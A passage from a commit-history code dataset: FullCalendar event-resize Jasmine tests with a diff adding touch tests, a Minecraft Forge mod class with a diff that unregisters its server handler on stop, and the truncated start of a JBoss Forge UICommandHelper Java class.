revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when rendering a timed event', function() { it('should not have resize capabilities', function(done) { options.events = [ { title: 'timed event', start: '2014-06-11T08:00:00', allDay: false } ]; options.eventAfterAllRender = function() { expect($('.fc-event .fc-resizer').length).toBe(0); done(); }; $('#cal').fullCalendar(options); }); }); }); describe('when in agenda view', function() { beforeEach(function() { options.defaultView = 'agendaWeek'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('th.fc-wed').width() * 1.5 // two days }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(2); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-14'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing a timed event with an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', end: '2014-06-11T07:00:00', allDay: false } ]; }); it('should have correct arguments with a timed delta', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); // TODO: test RTL it('should have correct arguments with a timed delta when resized to a different day', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day-header:first').width() * .9, // one day dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(1); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-12T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is local', function(done) { options.timezone = 'local'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); // compate to local moment expect(event.end).toEqualMoment(moment('2014-06-11T09:30:00')); revertFunc(); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); expect(event.end).toEqualMoment(moment('2014-06-11T07:00:00')); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is UTC', function(done) { options.timezone = 'UTC'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00+00:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00+00:00'); done(); } ); }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00 - 7:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should run the temporarily rendered event through eventRender', function(done) { options.eventRender = function(event, element) { element.addClass('didEventRender'); }; options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).toHaveClass('didEventRender'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should not fire the windowResize handler', function(done) { // bug 1116 // has to do this crap because PhantomJS was trigger false window resizes unrelated to the fc-event resize var alreadyRendered = false; var isDragging = false; var calledWhileDragging = false; options.windowResizeDelay = 0; options.windowResize = function(ev) { if (isDragging) { calledWhileDragging = true; } }; options.eventAfterAllRender = function() { if (alreadyRendered) { return; } alreadyRendered = true; setTimeout(function() { isDragging = true; $('.fc-event .fc-resizer').simulate('drag', { dy: 100, onBeforeRelease: function() { isDragging = false; }, onRelease: function() { expect(calledWhileDragging).toBe(false); done(); } }); }, 100); // hack for PhantomJS. after any initial false window resizes }; $('#cal').fullCalendar(options); }); }); describe('when resizing a timed event without an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', allDay: false } ]; }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); }); }); // Initialize a calendar, run a resize, and do type-checking of all arguments for all handlers. // TODO: more descrimination instead of just checking for 'object' function init(resizeStartFunc, resizeDoneFunc) { var eventsRendered = false; options.eventAfterAllRender = function() { if (!eventsRendered) { // because event rerendering will happen when resize is over resizeStartFunc(); eventsRendered = true; } }; options.eventResizeStart = function(event, jsEvent, uiEvent, view) { expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResizeStop = function(event, jsEvent, uiEvent, view) { expect(options.eventResizeStart).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResize = function(event, delta, revertFunc, jsEvent, uiEvent, view) { expect(options.eventResizeStop).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(moment.isDuration(delta)).toBe(true); expect(typeof revertFunc).toBe('function'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); // might be a non-jqui dummy object expect(typeof view).toBe('object'); resizeDoneFunc.apply(this, arguments); }; spyOn(options, 'eventResizeStart').and.callThrough(); spyOn(options, 'eventResizeStop').and.callThrough(); setTimeout(function() { // hack. agenda view scroll state would get messed up between tests $('#cal').fullCalendar(options); }, 0); } });
tests/automated/event-resize.js
describe('eventResize', function() { var options; beforeEach(function() { options = { defaultDate: '2014-06-11', editable: true }; affix('#cal'); }); afterEach(function() { $('#cal').fullCalendar('destroy'); }); describe('when in month view', function() { beforeEach(function() { options.defaultView = 'month'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height() }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when rendering a timed event', function() { it('should not have resize capabilities', function(done) { options.events = [ { title: 'timed event', start: '2014-06-11T08:00:00', allDay: false } ]; options.eventAfterAllRender = function() { expect($('.fc-event .fc-resizer').length).toBe(0); done(); }; $('#cal').fullCalendar(options); }); }); }); describe('when in agenda view', function() { beforeEach(function() { options.defaultView = 'agendaWeek'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('th.fc-wed').width() * 1.5 // two days }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(2); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-14'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing a timed event with an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', end: '2014-06-11T07:00:00', allDay: false } ]; }); it('should have correct arguments with a timed delta', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); // TODO: test RTL it('should have correct arguments with a timed delta when resized to a different day', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day-header:first').width() * .9, // one day dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(1); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-12T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is local', function(done) { options.timezone = 'local'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); // compate to local moment expect(event.end).toEqualMoment(moment('2014-06-11T09:30:00')); revertFunc(); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); expect(event.end).toEqualMoment(moment('2014-06-11T07:00:00')); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is UTC', function(done) { options.timezone = 'UTC'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00+00:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00+00:00'); done(); } ); }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00 - 7:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should run the temporarily rendered event through eventRender', function(done) { options.eventRender = function(event, element) { element.addClass('didEventRender'); }; options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).toHaveClass('didEventRender'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should not fire the windowResize handler', function(done) { // bug 1116 // has to do this crap because PhantomJS was trigger false window resizes unrelated to the fc-event resize var alreadyRendered = false; var isDragging = false; var calledWhileDragging = false; options.windowResizeDelay = 0; options.windowResize = function(ev) { if (isDragging) { calledWhileDragging = true; } }; options.eventAfterAllRender = function() { if (alreadyRendered) { return; } alreadyRendered = true; setTimeout(function() { isDragging = true; $('.fc-event .fc-resizer').simulate('drag', { dy: 100, onBeforeRelease: function() { isDragging = false; }, onRelease: function() { expect(calledWhileDragging).toBe(false); done(); } }); }, 100); // hack for PhantomJS. after any initial false window resizes }; $('#cal').fullCalendar(options); }); }); describe('when resizing a timed event without an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', allDay: false } ]; }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); }); }); // Initialize a calendar, run a resize, and do type-checking of all arguments for all handlers. // TODO: more descrimination instead of just checking for 'object' function init(resizeStartFunc, resizeDoneFunc) { var eventsRendered = false; options.eventAfterAllRender = function() { if (!eventsRendered) { // because event rerendering will happen when resize is over resizeStartFunc(); eventsRendered = true; } }; options.eventResizeStart = function(event, jsEvent, uiEvent, view) { expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResizeStop = function(event, jsEvent, uiEvent, view) { expect(options.eventResizeStart).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResize = function(event, delta, revertFunc, jsEvent, uiEvent, view) { expect(options.eventResizeStop).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(moment.isDuration(delta)).toBe(true); expect(typeof revertFunc).toBe('function'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); // might be a non-jqui dummy object expect(typeof view).toBe('object'); resizeDoneFunc.apply(this, arguments); }; spyOn(options, 'eventResizeStart').and.callThrough(); spyOn(options, 'eventResizeStop').and.callThrough(); setTimeout(function() { // hack. agenda view scroll state would get messed up between tests $('#cal').fullCalendar(options); }, 0); } });
tests: month view event resizing for touch
tests/automated/event-resize.js
tests: month view event resizing for touch
<ide><path>ests/automated/event-resize.js <ide> options.defaultView = 'month'; <ide> }); <ide> <del> describe('when resizing an all-day event', function() { <add> describe('when resizing an all-day event with mouse', function() { <ide> it('should have correct arguments with a whole-day delta', function(done) { <ide> options.events = [ { <ide> title: 'all-day event', <ide> $('.fc-event .fc-resizer').simulate('drag', { <ide> dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left <ide> dy: $('.fc-day').height() <add> }); <add> }, <add> function(event, delta, revertFunc) { <add> expect(delta.asDays()).toBe(5); <add> expect(delta.hours()).toBe(0); <add> expect(delta.minutes()).toBe(0); <add> expect(delta.seconds()).toBe(0); <add> expect(delta.milliseconds()).toBe(0); <add> <add> expect(event.start).toEqualMoment('2014-06-11'); <add> expect(event.end).toEqualMoment('2014-06-17'); <add> revertFunc(); <add> expect(event.start).toEqualMoment('2014-06-11'); <add> expect(event.end).toBeNull(); <add> <add> done(); <add> } <add> ); <add> }); <add> }); <add> <add> describe('when resizing an all-day event via touch', function() { <add> <add> it('should have correct arguments with a whole-day delta', function(done) { <add> options.isTouch = true; <add> options.longPressDelay = 100; <add> options.dragRevertDuration = 0; // so that eventDragStop happens immediately after touchend <add> options.events = [ { <add> title: 'all-day event', <add> start: '2014-06-11', <add> allDay: true <add> } ]; <add> <add> init( <add> function() { <add> $('.fc-event').simulate('drag', { <add> isTouch: true, <add> delay: 200, <add> onRelease: function() { <add> $('.fc-event .fc-resizer').simulate('drag', { <add> dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left <add> dy: $('.fc-day').height(), <add> isTouch: true <add> }); <add> } <ide> }); <ide> }, <ide> function(event, delta, revertFunc) {
Java
mit
15dd0f369187d697d0d14c73650778876385e117
0
Vlaeh/Minecraft.PlayersInBed
package vlaeh.minecraft.forge.playersinbed; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import net.minecraftforge.common.MinecraftForge; import net.minecraftforge.eventbus.api.SubscribeEvent; import net.minecraftforge.fml.ModLoadingContext; import net.minecraftforge.fml.client.event.ConfigChangedEvent; import net.minecraftforge.fml.common.Mod; import net.minecraftforge.fml.config.ModConfig; import net.minecraftforge.fml.event.server.FMLServerStartedEvent; import net.minecraftforge.fml.event.server.FMLServerStartingEvent; import net.minecraftforge.fml.event.server.FMLServerStoppedEvent; import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; @Mod(PlayersInBed.MODID) //TODO 1.13 guiFactory = "vlaeh.minecraft.forge.playersinbed.PlayersInBedGUIFactory") public class PlayersInBed { public static final String MODID = "playersinbed"; public static final Logger LOGGER = LogManager.getLogger(); public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); private PlayersInBedServerSide serverSide = null; public PlayersInBed() { LOGGER.debug("Creating Player In Bed mod"); ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); FMLJavaModLoadingContext.get().getModEventBus().register(this); MinecraftForge.EVENT_BUS.register(this); } @SubscribeEvent public void serverStarting(final FMLServerStartingEvent event) { LOGGER.info("Server starting"); PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); } @SubscribeEvent public void serverStarted(final FMLServerStartedEvent event) { LOGGER.info("Server started"); serverSide = new PlayersInBedServerSide(); MinecraftForge.EVENT_BUS.register(serverSide); } @SubscribeEvent public void serverStopped(final FMLServerStoppedEvent event) { LOGGER.info("Server stopped"); MinecraftForge.EVENT_BUS.unregister(serverSide); } @SubscribeEvent public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) { LOGGER.info("Config changed {}" + event); } @SubscribeEvent public void onLoad(final ModConfig.Loading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Loading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } @SubscribeEvent public void onFileChange(final ModConfig.ConfigReloading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Reloading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } }
src/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java
package vlaeh.minecraft.forge.playersinbed; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import net.minecraftforge.common.MinecraftForge; import net.minecraftforge.eventbus.api.SubscribeEvent; import net.minecraftforge.fml.ModLoadingContext; import net.minecraftforge.fml.client.event.ConfigChangedEvent; import net.minecraftforge.fml.common.Mod; import net.minecraftforge.fml.config.ModConfig; import net.minecraftforge.fml.event.server.FMLServerStartedEvent; import net.minecraftforge.fml.event.server.FMLServerStartingEvent; import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; @Mod(PlayersInBed.MODID) //TODO 1.13 guiFactory = "vlaeh.minecraft.forge.playersinbed.PlayersInBedGUIFactory") public class PlayersInBed { public static final String MODID = "playersinbed"; public static final Logger LOGGER = LogManager.getLogger(); public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); public PlayersInBed() { LOGGER.debug("Creating Player In Bed mod"); ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); FMLJavaModLoadingContext.get().getModEventBus().register(this); MinecraftForge.EVENT_BUS.register(this); } @SubscribeEvent public void serverStarting(FMLServerStartingEvent event) { LOGGER.info("Server starting"); PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); } @SubscribeEvent public void serverStarted(final FMLServerStartedEvent event) { LOGGER.info("Server started"); MinecraftForge.EVENT_BUS.register(new PlayersInBedServerSide()); } @SubscribeEvent public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) { LOGGER.info("Config changed {}" + event); } @SubscribeEvent public void onLoad(final ModConfig.Loading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Loading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } @SubscribeEvent public void onFileChange(final ModConfig.ConfigReloading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Reloading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } }
Avoid registring multiple instances when restarting local game
src/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java
Avoid registring multiple instances when restarting local game
<ide><path>rc/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java <ide> import net.minecraftforge.fml.config.ModConfig; <ide> import net.minecraftforge.fml.event.server.FMLServerStartedEvent; <ide> import net.minecraftforge.fml.event.server.FMLServerStartingEvent; <add>import net.minecraftforge.fml.event.server.FMLServerStoppedEvent; <ide> import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; <ide> import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; <ide> <ide> public static final Logger LOGGER = LogManager.getLogger(); <ide> public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); <ide> <add> private PlayersInBedServerSide serverSide = null; <add> <ide> public PlayersInBed() { <ide> LOGGER.debug("Creating Player In Bed mod"); <ide> ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); <ide> } <ide> <ide> @SubscribeEvent <del> public void serverStarting(FMLServerStartingEvent event) { <add> public void serverStarting(final FMLServerStartingEvent event) { <ide> LOGGER.info("Server starting"); <ide> PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); <ide> } <ide> @SubscribeEvent <ide> public void serverStarted(final FMLServerStartedEvent event) { <ide> LOGGER.info("Server started"); <del> MinecraftForge.EVENT_BUS.register(new PlayersInBedServerSide()); <add> serverSide = new PlayersInBedServerSide(); <add> MinecraftForge.EVENT_BUS.register(serverSide); <ide> } <add> <add> @SubscribeEvent <add> public void serverStopped(final FMLServerStoppedEvent event) { <add> LOGGER.info("Server stopped"); <add> MinecraftForge.EVENT_BUS.unregister(serverSide); <add> } <add> <ide> <ide> @SubscribeEvent <ide> public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) {
Java
epl-1.0
a83e8cbefaa3d89c67210809a7fe6a1cb0e64708
0
forge/forge-service,forge/forge-service,forge/forge-service
/* * Copyright 2015 Red Hat, Inc. and/or its affiliates. * * Licensed under the Eclipse Public License version 1.0, available at * http://www.eclipse.org/legal/epl-v10.html */ package org.jboss.forge.service.util; import static javax.json.Json.createArrayBuilder; import static javax.json.Json.createObjectBuilder; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.ArrayList; import javax.inject.Inject; import javax.json.JsonArray; import javax.json.JsonArrayBuilder; import javax.json.JsonNumber; import javax.json.JsonObject; import javax.json.JsonObjectBuilder; import javax.json.JsonString; import javax.json.JsonValue; import javax.json.JsonValue.ValueType; import org.jboss.forge.addon.convert.Converter; import org.jboss.forge.addon.convert.ConverterFactory; import org.jboss.forge.addon.ui.controller.CommandController; import org.jboss.forge.addon.ui.controller.WizardCommandController; import org.jboss.forge.addon.ui.input.HasCompleter; import org.jboss.forge.addon.ui.input.InputComponent; import org.jboss.forge.addon.ui.input.ManyValued; import org.jboss.forge.addon.ui.input.SelectComponent; import org.jboss.forge.addon.ui.input.SingleValued; import org.jboss.forge.addon.ui.input.UICompleter; import org.jboss.forge.addon.ui.input.UIInput; import org.jboss.forge.addon.ui.input.UIInputMany; import org.jboss.forge.addon.ui.input.UISelectMany; import org.jboss.forge.addon.ui.input.UISelectOne; import org.jboss.forge.addon.ui.metadata.UICommandMetadata; import org.jboss.forge.addon.ui.output.UIMessage; import org.jboss.forge.addon.ui.result.CompositeResult; import org.jboss.forge.addon.ui.result.Failed; import org.jboss.forge.addon.ui.result.Result; import org.jboss.forge.addon.ui.util.InputComponents; import org.jboss.forge.furnace.proxy.Proxies; import org.jboss.forge.service.ui.RestUIProvider; /** * Describes commands * * @author <a href="mailto:[email protected]">George Gastaldi</a> */ public class UICommandHelper { private final ConverterFactory converterFactory; @Inject public UICommandHelper(ConverterFactory converterFactory) { this.converterFactory = converterFactory; } public void describeController(JsonObjectBuilder builder, CommandController controller) { describeMetadata(builder, controller); describeCurrentState(builder, controller); describeInputs(builder, controller); } public void describeCurrentState(JsonObjectBuilder builder, CommandController controller) { JsonObjectBuilder stateBuilder = createObjectBuilder(); stateBuilder.add("valid", controller.isValid()); stateBuilder.add("canExecute", controller.canExecute()); if (controller instanceof WizardCommandController) { stateBuilder.add("wizard", true); stateBuilder.add("canMoveToNextStep", ((WizardCommandController) controller).canMoveToNextStep()); stateBuilder.add("canMoveToPreviousStep", ((WizardCommandController) controller).canMoveToPreviousStep()); } else { stateBuilder.add("wizard", false); } builder.add("state", stateBuilder); } public void describeMetadata(JsonObjectBuilder builder, CommandController controller) { UICommandMetadata metadata = controller.getMetadata(); JsonObjectBuilder metadataBuilder = createObjectBuilder(); metadataBuilder.add("deprecated", metadata.isDeprecated()); addOptional(metadataBuilder, "category", metadata.getCategory()); addOptional(metadataBuilder, "name", metadata.getName()); addOptional(metadataBuilder, "description", metadata.getDescription()); addOptional(metadataBuilder, "deprecatedMessage", metadata.getDeprecatedMessage()); builder.add("metadata", metadataBuilder); } @SuppressWarnings("unchecked") public void describeInputs(JsonObjectBuilder builder, CommandController controller) { // Add inputs JsonArrayBuilder inputBuilder = createArrayBuilder(); for (InputComponent<?, ?> input : controller.getInputs().values()) { JsonObjectBuilder objBuilder = createObjectBuilder() .add("name", input.getName()) .add("shortName", String.valueOf(input.getShortName())) .add("valueType", input.getValueType().getName()) .add("inputType", InputComponents.getInputType(input)) .add("enabled", input.isEnabled()) .add("required", input.isRequired()) .add("deprecated", input.isDeprecated()) .add("label", InputComponents.getLabelFor(input, false)); addOptional(objBuilder, "description", input.getDescription()); addOptional(objBuilder, "note", input.getNote()); Converter<Object, String> inputConverter = null; if (input instanceof SelectComponent) { SelectComponent<?, Object> selectComponent = (SelectComponent<?, Object>) input; inputConverter = InputComponents.getItemLabelConverter(converterFactory, selectComponent); JsonArrayBuilder valueChoices = createArrayBuilder(); for (Object valueChoice : 